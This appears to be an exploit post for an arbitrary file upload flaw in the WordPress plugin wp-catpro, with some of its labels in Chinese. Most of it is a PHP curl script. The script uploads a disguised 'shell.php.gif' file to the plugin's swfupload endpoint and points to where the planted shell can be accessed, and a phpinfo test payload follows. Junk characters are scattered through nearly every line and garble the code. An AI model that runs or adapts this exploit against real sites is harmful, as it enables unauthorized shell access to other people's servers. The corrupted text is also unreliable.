Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability$ k( k! N" i/ J& y* t
#-----------------------------------------------------------------------
$ X6 }, Y1 N/ _1 V! Y7 g: W
9 f0 M M) d. q0 o0 f作者 => Zikou-16+ Q% O2 l$ `/ \" ?; ?2 ]: I4 Q
邮箱 => zikou16x@gmail.com
% A$ m# h; I. p测试系统 : Windows 7 , Backtrack 5r30 a0 B/ D+ @$ C" x
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip3 f! D, C1 {: u' v1 ]7 Z0 Y) ~5 ~& D
####' h8 y7 D2 o3 {
# E- D, b! p4 S8 ?/ n- h- n, q
#=> Exploit 信息:/ Y! _" D7 ?* t- ^
------------------
! y* v1 Q9 w+ ~4 |# 攻击者可以上传 file/shell.php.gif$ D: @/ @' j1 o0 |. P+ ~
# ("jpg", "gif", "png") // Allowed file extensions# W e( K( [% P2 x/ i
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
' ~3 M( {+ w6 r% c# {# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
$ p( V) W5 R1 y# j------------------ a$ w8 H0 i# J% A
3 ?& l+ \ D! v% D1 c! |
#=> Exploit
. X3 k9 o/ i7 Y+ ^4 ^. g2 |-----------; i2 Q0 ^( G; }3 Z5 y
<?php( b6 m& D1 y4 E4 _! b; a4 Y
. l2 d0 Q) Y, m$ |$uploadfile="zik.php.gif";
3 m- M! P+ ]/ S1 D7 w) |; r0 ?# g$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
+ x5 F. q6 n8 i" N: S' f6 b/ o' a( bcurl_setopt($ch, CURLOPT_POST, true);
( S- _6 M: g+ d1 H' [3 zcurl_setopt($ch, CURLOPT_POSTFIELDS,; ^2 y. F3 B7 A) V; m$ B$ a
array('Filedata'=>"@$uploadfile",
# s; H. N2 C+ E$ [6 z'folder'=>'/wp-content/uploads/catpro/'));9 C, X5 S) B$ W2 g% @ g
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
# u7 v) O4 c2 z ]$postResult = curl_exec($ch);
4 Q$ b% {4 |2 D1 N# O, \ ccurl_close($ch);
! _- N* m8 }- L/ X, m ! H7 h' l2 |2 V- Q
print "$postResult";
/ e; E$ v' q) m5 A# b; K/ v% \$ J , @7 Q. t; {+ N7 ~
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif- r- a3 {8 p& |$ d
?>
% S0 `3 l) a6 ~! ]<?php+ N9 ~: j8 x2 h
phpinfo();; ]$ x4 T7 p& H% B) `
?> |